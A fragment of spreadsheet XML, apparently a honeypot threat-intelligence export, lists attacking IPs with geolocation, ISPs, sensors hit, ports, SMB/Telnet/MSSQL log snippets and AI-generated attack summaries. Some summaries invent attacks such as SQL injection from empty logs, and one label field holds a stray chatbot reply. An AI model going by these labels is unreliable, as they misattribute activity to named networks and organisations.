(,)}&amp;&amp;{Data_SMB:Incoming connection (189.57.191.214,58170)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:bd39:bfd6</t>
  </si>
  <si>
    <t>1f04f080b8ceeee11c79c90a7f7fa698</t>
  </si>
  <si>
    <t>185.213.193.28</t>
  </si>
  <si>
    <t>['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>['anonymous-proxy']</t>
  </si>
  <si>
    <t>VT</t>
  </si>
  <si>
    <t>Vermont</t>
  </si>
  <si>
    <t>Orleans</t>
  </si>
  <si>
    <t>North Troy</t>
  </si>
  <si>
    <t>5239255</t>
  </si>
  <si>
    <t>05859</t>
  </si>
  <si>
    <t>44.9945</t>
  </si>
  <si>
    <t>-72.3998</t>
  </si>
  <si>
    <t>Mullvad VPN AB</t>
  </si>
  <si>
    <t>2021-07-06</t>
  </si>
  <si>
    <t>::ffff:b9d5:c11c</t>
  </si>
  <si>
    <t>04d8b81a1ef08490498e184d9d6fa057</t>
  </si>
  <si>
    <t>103.191.109.9</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;28574&amp;&amp;1433&amp;&amp;22</t>
  </si>
  <si>
    <t>Kota Bandung</t>
  </si>
  <si>
    <t>Ujungberung</t>
  </si>
  <si>
    <t>1622801</t>
  </si>
  <si>
    <t>-6.9203600000000005</t>
  </si>
  <si>
    <t>107.679</t>
  </si>
  <si>
    <t>147154</t>
  </si>
  <si>
    <t>PT Pass Internet Indonesia</t>
  </si>
  <si>
    <t>PASSNET</t>
  </si>
  <si>
    <t>2022-07-18</t>
  </si>
  <si>
    <t>PASSNET-ID</t>
  </si>
  <si>
    <t>::ffff:67bf:6d09</t>
  </si>
  <si>
    <t>The attackers are attempting to scan and gather information about the services available on the targeted system, likely for reconnaissance purposes. They are also trying to brute-force passwords, exploit vulnerabilities, and inject malicious payloads into the systems. &amp;&amp; This indicates a failed login attempt to an MSSQL server, suggesting a possible brute-force attack or unauthorized access attempt. The absence of any other information makes it unclear whether this was a legitimate mistake or malicious activity. This could be the first step in a larger attack on the system.</t>
  </si>
  <si>
    <t>DDoS</t>
  </si>
  <si>
    <t>b308cd9a9c2e2f52e0726b07f65d138a</t>
  </si>
  <si>
    <t>58.187.76.236</t>
  </si>
  <si>
    <t>70</t>
  </si>
  <si>
    <t>Vĩnh Phúc Province</t>
  </si>
  <si>
    <t>Lập Thạch District</t>
  </si>
  <si>
    <t>Lập Thạch</t>
  </si>
  <si>
    <t>8310244</t>
  </si>
  <si>
    <t>21.4154</t>
  </si>
  <si>
    <t>105.461</t>
  </si>
  <si>
    <t>2005-07-14</t>
  </si>
  <si>
    <t>FPTDYNAMICIP-NET</t>
  </si>
  <si>
    <t>::ffff:3abb:4cec</t>
  </si>
  <si>
    <t>57e2b29761d7cf39c31e0d2600275168</t>
  </si>
  <si>
    <t>106.215.151.150</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>OD</t>
  </si>
  <si>
    <t>Odisha</t>
  </si>
  <si>
    <t>Khordha</t>
  </si>
  <si>
    <t>Bhubaneswar</t>
  </si>
  <si>
    <t>1275817</t>
  </si>
  <si>
    <t>20.2724</t>
  </si>
  <si>
    <t>85.8338</t>
  </si>
  <si>
    <t>2011-03-17</t>
  </si>
  <si>
    <t>NOIDA-DELHI-NCR</t>
  </si>
  <si>
    <t>::ffff:6ad7:9796</t>
  </si>
  <si>
    <t>9596f89fc6e0e77efb0f640d23a3fd80</t>
  </si>
  <si>
    <t>103.187.230.117</t>
  </si>
  <si>
    <t>Kendujhar</t>
  </si>
  <si>
    <t>Barbil</t>
  </si>
  <si>
    <t>7279597</t>
  </si>
  <si>
    <t>758035</t>
  </si>
  <si>
    <t>22.1148</t>
  </si>
  <si>
    <t>85.3861</t>
  </si>
  <si>
    <t>134880</t>
  </si>
  <si>
    <t>Flix Broadband Services Private Limited</t>
  </si>
  <si>
    <t>LS CABLE NETWORK</t>
  </si>
  <si>
    <t>2022-05-19</t>
  </si>
  <si>
    <t>FLIXNETOD</t>
  </si>
  <si>
    <t>::ffff:67bb:e675</t>
  </si>
  <si>
    <t>3899f6fcf7f59f98d86cbcf0a9878c4e</t>
  </si>
  <si>
    <t>117.194.243.119</t>
  </si>
  <si>
    <t>::ffff:75c2:f377</t>
  </si>
  <si>
    <t>ada138f5da1ec015d9e3287f84e5e632</t>
  </si>
  <si>
    <t>117.204.235.184</t>
  </si>
  <si>
    <t>::ffff:75cc:ebb8</t>
  </si>
  <si>
    <t>fb26afa5145945b79ec588c3b759b81f</t>
  </si>
  <si>
    <t>117.214.138.71</t>
  </si>
  <si>
    <t>::ffff:75d6:8a47</t>
  </si>
  <si>
    <t>fecaadf4062f5d01f268cb9fe5d48be8</t>
  </si>
  <si>
    <t>117.194.187.187</t>
  </si>
  <si>
    <t>::ffff:75c2:bbbb</t>
  </si>
  <si>
    <t>f50481a00b9e6aef29a9755eca9ed538</t>
  </si>
  <si>
    <t>112.133.222.158</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_SMB_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;NA&amp;&amp;445&amp;&amp;445&amp;&amp;3007</t>
  </si>
  <si>
    <t>Shri Vishnu Engineering College for Women Autonomous</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,54426)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61398)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61465)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,62054)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,64161)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65284)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65334)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,53089)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,53461)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57029)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57122)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58702)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58788)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57124)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58728)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,49304)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,51473)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61823)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61826)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60213)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,64886)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61018)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,56438)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60275)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63927)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50519)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50146)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,55222)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,55316)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61324)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60573)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,49943)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63548)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63549)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58528)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65016)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,56136)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:7085:de9e</t>
  </si>
  <si>
    <t>c8e5437e114a3274f1391b32c054bcfd</t>
  </si>
  <si>
    <t>200.123.238.89</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>Caieiras</t>
  </si>
  <si>
    <t>3468215</t>
  </si>
  <si>
    <t>-23.3642</t>
  </si>
  <si>
    <t>-46.7406</t>
  </si>
  <si>
    <t>270270</t>
  </si>
  <si>
    <t>Gama Telecom</t>
  </si>
  <si>
    <t>::ffff:c87b:ee59</t>
  </si>
  <si>
    <t>c296eed827a86165d1336b378f412a16</t>
  </si>
  <si>
    <t>117.206.57.57</t>
  </si>
  <si>
    <t>::ffff:75ce:3939</t>
  </si>
  <si>
    <t>efa61b1ec8935851b0c1aca878adf97a</t>
  </si>
  <si>
    <t>45.186.39.173</t>
  </si>
  <si>
    <t>269409</t>
  </si>
  <si>
    <t>Rio Online Telecomunicações e Informática Ltda Me</t>
  </si>
  <si>
    <t>::ffff:2dba:27ad</t>
  </si>
  <si>
    <t>299fcf2fe8986eed7f67097b8fd67c62</t>
  </si>
  <si>
    <t>117.216.209.62</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;29772&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75d8:d13e</t>
  </si>
  <si>
    <t>7838d7730f48b2d4614e7feac70d07aa</t>
  </si>
  <si>
    <t>206.0.181.184</t>
  </si>
  <si>
    <t>Sucrev Municipality</t>
  </si>
  <si>
    <t>Caja Seca</t>
  </si>
  <si>
    <t>3647462</t>
  </si>
  <si>
    <t>9.14151</t>
  </si>
  <si>
    <t>-71.0674</t>
  </si>
  <si>
    <t>271907</t>
  </si>
  <si>
    <t>AS271907</t>
  </si>
  <si>
    <t>Colnetwork C.A.</t>
  </si>
  <si>
    <t>Colnetwork C.A</t>
  </si>
  <si>
    <t>::ffff:ce00:b5b8</t>
  </si>
  <si>
    <t>2793e9a03c2172bb886d0ddff5cae31b</t>
  </si>
  <si>
    <t>61.3.218.138</t>
  </si>
  <si>
    <t>::ffff:3d03:da8a</t>
  </si>
  <si>
    <t>30c904b8307a76bc33befdc7f3c313f8</t>
  </si>
  <si>
    <t>103.155.105.105</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>JT</t>
  </si>
  <si>
    <t>Central Java</t>
  </si>
  <si>
    <t>Kabupaten Wonosobo</t>
  </si>
  <si>
    <t>Sambek</t>
  </si>
  <si>
    <t>6405081</t>
  </si>
  <si>
    <t>-7.36405</t>
  </si>
  <si>
    <t>109.899</t>
  </si>
  <si>
    <t>141053</t>
  </si>
  <si>
    <t>Pemerintah Kabupaten Wonosobo</t>
  </si>
  <si>
    <t>2020-09-04</t>
  </si>
  <si>
    <t>IDNIC-WONOSOBOKAB-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.155.105.105,63016)}&amp;&amp;{Data_SMB:Incoming connection (103.155.105.105,50812)}</t>
  </si>
  <si>
    <t>::ffff:679b:6969</t>
  </si>
  <si>
    <t>An incoming network connection from IP address 103.155.105.105 to a service on port 50812 may indicate an attempt to exploit a vulnerable service or initiate unauthorized access. This could be related to scanning for open ports or attempting to gain unauthorized access to the targeted system. Further investigation is required to determine the intent behind this activity. &amp;&amp; A suspicious incoming connection from an external IP address has been detected to a SMB service, indicating potential unauthorized access attempts to shared resources or data on the network. This could be related to malware or ransomware infections or even brute-force login attempts. The source IP address (103.155.105.105) may be associated with malicious activity.</t>
  </si>
  <si>
    <t>SMB Attack &amp;&amp; Port Scanner</t>
  </si>
  <si>
    <t>12354a60004b9b5fa66c5c878c36cd50</t>
  </si>
  <si>
    <t>103.66.72.132</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>23&amp;&amp;28711&amp;&amp;NA&amp;&amp;19165</t>
  </si>
  <si>
    <t>Ghazipur</t>
  </si>
  <si>
    <t>Muhammadābād</t>
  </si>
  <si>
    <t>1262626</t>
  </si>
  <si>
    <t>25.6191</t>
  </si>
  <si>
    <t>83.7558</t>
  </si>
  <si>
    <t>::ffff:6742:4884</t>
  </si>
  <si>
    <t>There is no data provided for analysis. &amp;&amp; The data suggests an attempt to connect to a service using TELNET protocol but was unsuccessful as indicated by the value of NA for Data_TELNET, implying no malicious activity was detected or logged due to this attempt. The lack of data indicates that the attempt was likely blocked or failed. This might be a probing or reconnaissance attempt. &amp;&amp; No available log data provided, unable to analyze activity. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity.</t>
  </si>
  <si>
    <t>Telnet Scanning &amp;&amp; I'd be happy to help you analyze the log data! However, I don't see any log data provided. Please paste the log data for me to analyze and I'll provide the names of the attacks in a short phrase (max 2 words).</t>
  </si>
  <si>
    <t>2cff8fc9e91526b5fa703a865aa41921</t>
  </si>
  <si>
    <t>117.194.66.188</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>::ffff:75c2:42bc</t>
  </si>
  <si>
    <t>d4d7b8b1bc753ed0e07608896b93da6e</t>
  </si>
  <si>
    <t>117.209.93.31</t>
  </si>
  <si>
    <t>::ffff:75d1:5d1f</t>
  </si>
  <si>
    <t>a5343432e9709c7f67a1892f63e82859</t>
  </si>
  <si>
    <t>176.36.63.102</t>
  </si>
  <si>
    <t>host-176-36-63-102.b024.la.net.ua&amp;&amp;NA</t>
  </si>
  <si>
    <t>39608</t>
  </si>
  <si>
    <t>Lanet Network Ltd</t>
  </si>
  <si>
    <t>Lanet Network</t>
  </si>
  <si>
    <t>::ffff:b024:3f66</t>
  </si>
  <si>
    <t>cc6ebe779ee61ff1446cb740db0af12d</t>
  </si>
  <si>
    <t>103.210.206.26</t>
  </si>
  <si>
    <t>Karur</t>
  </si>
  <si>
    <t>1267648</t>
  </si>
  <si>
    <t>639001</t>
  </si>
  <si>
    <t>10.9601</t>
  </si>
  <si>
    <t>78.0766</t>
  </si>
  <si>
    <t>134918</t>
  </si>
  <si>
    <t>Blue Net It Soltions Pvt Ltd</t>
  </si>
  <si>
    <t>Blue Net It Solutions Pvt Ltd</t>
  </si>
  <si>
    <t>2016-03-03</t>
  </si>
  <si>
    <t>BLUENET</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,50016)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,52840)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60049)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60602)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,59017)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,59744)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.210.206.26,60654)}</t>
  </si>
  <si>
    <t>::ffff:67d2:ce1a</t>
  </si>
  <si>
    <t>A suspicious incoming SMB connection from IP address 103.210.206.26, potentially attempting to access the system or steal sensitive data. This may be a sign of a ransomware or malware attack. The source IP has an unusual port number (60654), indicating possible malicious intent. &amp;&amp; Possible malicious activity detected, an incoming SMB connection from unknown IP address 103.210.206.26 to port 60654. This could be a scanning attempt or a potential malware transmission. Further analysis is required to confirm the nature of this activity.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Bruteforce</t>
  </si>
  <si>
    <t>8a2196091a9a9fffca434f438609c909</t>
  </si>
  <si>
    <t>117.214.78.227</t>
  </si>
  <si>
    <t>::ffff:75d6:4ee3</t>
  </si>
  <si>
    <t>No incoming connection attempts for Telnet service were recorded. This suggests that malicious actors did not target this specific service during the monitoring period. The absence of any activity indicates no attempted exploitation or scanning occurred via Telnet. &amp;&amp; No TELNET activity detected in this log entry, suggesting that potential malicious scans or attempts to exploit vulnerabilities related to TELNET services may have been blocked. 
This absence of TELNET activity could indicate a defensive measure against unwanted access attempts.
The lack of TELNET interaction in the data might also imply an ongoing monitoring and filtering process to prevent unauthorized connections.</t>
  </si>
  <si>
    <t>a65b556aea44b94e39e68af886fd5915</t>
  </si>
  <si>
    <t>59.89.13.208</t>
  </si>
  <si>
    <t>::ffff:3b59:dd0</t>
  </si>
  <si>
    <t>8e783586b55b186d535a53635aff6c30</t>
  </si>
  <si>
    <t>45.155.91.130</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_IRC_H15&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_SMTP_H16&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H40</t>
  </si>
  <si>
    <t>41941&amp;&amp;6667&amp;&amp;48604&amp;&amp;443&amp;&amp;56261&amp;&amp;53807&amp;&amp;445&amp;&amp;55401&amp;&amp;1433&amp;&amp;110&amp;&amp;21&amp;&amp;25&amp;&amp;389&amp;&amp;48318&amp;&amp;5432&amp;&amp;3306&amp;&amp;9100&amp;&amp;6379&amp;&amp;1080&amp;&amp;1521&amp;&amp;8443&amp;&amp;41324&amp;&amp;47217&amp;&amp;58528&amp;&amp;53464&amp;&amp;55205&amp;&amp;NA&amp;&amp;56853&amp;&amp;42720&amp;&amp;57481</t>
  </si>
  <si>
    <t>14</t>
  </si>
  <si>
    <t>Mazovia</t>
  </si>
  <si>
    <t>Warszawa</t>
  </si>
  <si>
    <t>Warsaw</t>
  </si>
  <si>
    <t>756135</t>
  </si>
  <si>
    <t>52.2297</t>
  </si>
  <si>
    <t>21.0122</t>
  </si>
  <si>
    <t>47154</t>
  </si>
  <si>
    <t>HUSAM A. H. HIJAZI</t>
  </si>
  <si>
    <t>Husam A. H. Hijazi</t>
  </si>
  <si>
    <t>Dedires</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '38.54.63.23:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '154.93.37.45:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '103.211.202.140:8443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Connection': 'TE, close', 'Host': '185.255.123.181:443', 'TE': 'deflate,gzip;q=0.3', 'User-Agent': 'libwww-perl/6.05', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2d9b:5b82</t>
  </si>
  <si>
    <t>There is no log data provided to analyze.</t>
  </si>
  <si>
    <t>053bc8de50fcd7453b85e0674eaa6763</t>
  </si>
  <si>
    <t>59.178.5.211</t>
  </si>
  <si>
    <t>::ffff:3bb2:5d3</t>
  </si>
  <si>
    <t>5e0db8828c463745b6b6c28124fe4ac1</t>
  </si>
  <si>
    <t>1.4.192.172</t>
  </si>
  <si>
    <t>node-crw.pool-1-4.dynamic.nt-isp.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Chatuchak</t>
  </si>
  <si>
    <t>7026785</t>
  </si>
  <si>
    <t>13.8289</t>
  </si>
  <si>
    <t>100.56</t>
  </si>
  <si>
    <t>::ffff:104:c0ac</t>
  </si>
  <si>
    <t>b88cf7fbb01ad3fbc611471f2a629c64</t>
  </si>
  <si>
    <t>117.214.136.170</t>
  </si>
  <si>
    <t>::ffff:75d6:88aa</t>
  </si>
  <si>
    <t>No activity detected for TELNET service. This could indicate that either the honeypot is inactive or not receiving any traffic for this particular service. Normal behavior would be to see some level of activity if it's online and active. &amp;&amp; Possible malicious activity: No log entry was recorded for Telnet service indicating no login or connection attempt was detected, which may suggest that the malicious actor did not try to access this specific service. 
This lack of activity might indicate a targeted attack, where the attacker avoided detection by this particular method. 
Alternatively, it could simply be an error in logging.</t>
  </si>
  <si>
    <t>Telnet Brute &amp;&amp; Telnet Scan</t>
  </si>
  <si>
    <t>2c5ceb0cac892c979f26985a4738a6eb</t>
  </si>
  <si>
    <t>223.185.129.152</t>
  </si>
  <si>
    <t>12.9719</t>
  </si>
  <si>
    <t>77.5937</t>
  </si>
  <si>
    <t>AIRTELBROADBAND-AS-AP</t>
  </si>
  <si>
    <t>::ffff:dfb9:8198</t>
  </si>
  <si>
    <t>No attempt was made to access Microsoft SQL database, likely indicating a reconnaissance activity or probing for vulnerabilities. &amp;&amp; Data indicates an attempted SQL injection, potentially exploiting a vulnerability in a Microsoft SQL Server application to gain unauthorized access or extract sensitive information. The lack of data suggests the attacker may be probing for vulnerabilities before launching a full-scale attack. This could be the initial step in a larger malicious operation.</t>
  </si>
  <si>
    <t>SQL Attack &amp;&amp; SQL Injection</t>
  </si>
  <si>
    <t>02f87e0981a399947d14b5c5e619a336</t>
  </si>
  <si>
    <t>117.247.51.43</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H39</t>
  </si>
  <si>
    <t>BB-Multiplay-Static</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53888)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53933)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,53934)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54015)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54062)}&amp;&amp;{Data_SMB:Incoming connection (117.247.51.43,54063)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection 